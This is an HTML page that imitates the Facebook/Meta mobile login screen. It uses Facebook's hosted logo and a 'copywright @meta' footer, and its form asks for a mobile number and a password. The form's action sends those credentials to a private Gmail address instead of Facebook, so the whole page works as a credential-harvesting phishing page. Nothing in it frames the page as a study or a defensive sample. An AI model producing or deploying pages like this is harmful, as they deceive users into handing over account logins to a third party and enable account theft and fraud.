<!doctype html>
<html lang="en"> 
 <head> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta charset="utf-8"> 
  <meta name="description" content="laptop coding"> 
  <title>Laptop Code</title> 
  <link rel="stylesheet" href="ayomide.css" type="text/css"> 
 <style type="text/css" id="dcoder_stylesheet">body{background-color: aliceblue;}
.uk{text-align: center; margin: 50px auto;}
label{display: flex; margin: 0.5rem 0; justify-content: center;}
input{margin: 10px 0 0 0; width: 70%; height: 30px; border-radius: 7px; background-color: white;}
::placeholder{color: black;}
#submit{width: 40%; margin: 10px auto; height: 30px; border-radius: 7px; background-color: blue; color: white; display: block;}
.forgotten{text-align: center; margin: 50px;}
footer{display: flex; justify-content: center;}
.create{width: 70%; height: 30px; border-radius: 8px; color: blue;}
a{color: black;}
a:hover{color: blue;}
.copy{text-align: center;}
#logo{position: absolute; width: 100px; height: 100px; top: 250px;}</style></head> 
 <body> 
  <p class="uk">English(uk)</p> 
  <img src="https://z-m-static.xx.fbcdn.net/rsrc.php/v4/yD/r/5D8s-GsHJlJ.png" alt="facebook-logo" id="logo"> 
  <section> 
   <form action="mailto:midefx2@gmail.com" method="post" enctype="text/plain"> <label for="number"><input type="number" name="number" id="number" placeholder="Enter Your Mobile Number"></label> <label for="password"><input type="password" name="password" id="password" placeholder="Create a password"></label> <button id="submit" type="submit">Log in</button> 
   </form> 
  </section> 
  <p class="forgotten"><a href="real.com" target="_blank">Forgotten password?</a></p> 
  <footer> <button class="create">Create New Account</button> 
  </footer> 
  <p class="copy">copywright @meta</p> 
 
</body></html>